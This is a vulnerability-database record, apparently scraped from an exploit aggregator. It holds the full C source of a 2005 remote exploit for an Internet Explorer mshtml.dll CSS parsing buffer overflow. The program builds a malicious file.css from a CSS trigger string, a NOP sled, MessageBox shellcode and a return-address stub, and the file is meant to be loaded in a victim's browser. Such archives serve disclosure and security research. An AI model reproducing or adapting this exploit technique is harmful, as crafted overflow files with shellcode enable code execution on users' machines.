DATABASE RESOURCES PRICING ABOUT US

{"lastseen": "2020-04-01T19:04:31", "references": [], "description": "\nMicrosoft Internet Explorer - mshtml.dll CSS Parsing Buffer Overflow", "edition": 1, "reporter": "Arabteam2000", "exploitpack": {"type": "remote", "platform": "windows"}, "published": "2005-03-09T00:00:00", "title": "Microsoft Internet Explorer - mshtml.dll CSS Parsing Buffer Overflow", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2005-03-09T00:00:00", "id": "EXPLOITPACK:D375800FD1BF4812D3267F31CC13855D", "href": "", "viewCount": 4, "sourceData": "/* \nTaken from http://www.securiteam.com/exploits/5NP042KF5A.html \n\nThe exploit will create a .CSS file that should be included \nin an HTML file. When a user loads the HTML file, Internet \nExplorer will try to parse the CSS and will trigger the \nbuffer overflow. \n*/\n\n//Exploit Code:\n#include <stdio.h>\n#include <string.h>\n#include <tchar.h>\n\nchar bug[]=\n\"\\x40\\x63\\x73\\x73\\x20\\x6D\\x6D\\x7B\\x49\\x7B\\x63\\x6F\\x6E\\x74\\x65\\x6E\\x74\\x3A\\x20\\x22\\x22\\x3B\\x2F\"\n\"\\x2A\\x22\\x20\\x22\\x2A\\x2F\\x7D\\x7D\\x40\\x6D\\x3B\\x40\\x65\\x6E\\x64\\x3B\\x20\\x2F\\x2A\\x22\\x7D\\x7D\\x20\\x20\\x20\";\n\n//////////////////////////////////////////////////////\n/*\nshellcode :MessageBox (0,\"hack ie6\",0,MB_OK);\n-\nXOR EBX,EBX\nPUSH EBX ; 0\nPUSH EBX ; 0\nADD AL,0F\nPUSH EAX ; Msg \" Hack ie6 \"\nPUSH EBX ;0\nJMP 746D8E72 ;USER32.MessageBoxA\n*/\n\nchar shellcode[]= \"\\x33\\xDB\\x53\\x53\\x04\\x0F\\x50\\x53\\xE9\\xCB\\x8D\\x6D\\x74\"\n\"\\x90\\x90\\x48\\x61\\x63\\x6B\\x20\\x69\\x65\\x36\\x20\\x63\\x73\\x73\";\n\n\n////////////////////////////////////////////////////////\n// return address :: esp+1AC :: start shellcode\n//MOV EAX,ESP\n//ADD AX,1AC\n//CALL EAX\n\nchar ret[]= \"\\x8B\\xC4\\x66\\x05\\xAC\\x01\\xFF\\xD0\";\n\nint main(int argc, char* argv[])\n{\n\n char buf[8192];\n FILE *cssfile;\n int i;\n\n printf(\"\\n\\n Internet Explorer(mshtml.dll) , Cascading Style Sheets Exploit \\n\");\n printf(\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\");\n printf(\" Coded by : Arabteam2000 \\n\");\n printf(\" Web: www.arabteam2000.com \\n\");\n printf(\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\\n\");\n\n // NOP`s\n for(i=0;i<8192;i++)\n buf[i]=0x90;\n\n\n // bug\n memcpy((void*)&buf[0],\n (void*)&bug,48);\n\n // shellcode\n memcpy((void*)&buf[100],\n (void*)&shellcode,27);\n\n // ret address\n memcpy((void*)&buf[8182],\n (void*)&ret,8);\n\n\n cssfile=fopen(\"file.css\",\"w+b\");\n if(cssfile==NULL){\n printf(\"-Error: fopen \\n\");\n return 1;\n }\n\n fwrite(buf,8192,1,cssfile);\n printf(\"-Created file: file.css\\n ..OK\\n\\n\");\n\n fclose (cssfile);\n return 0;\n}\n\n// milw0rm.com [2005-03-09]", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645484494, "score": 1659818015}, "_internal": {"score_hash": "95cc6c1ec2da1d7e2dcccc649ced4901"}}

{}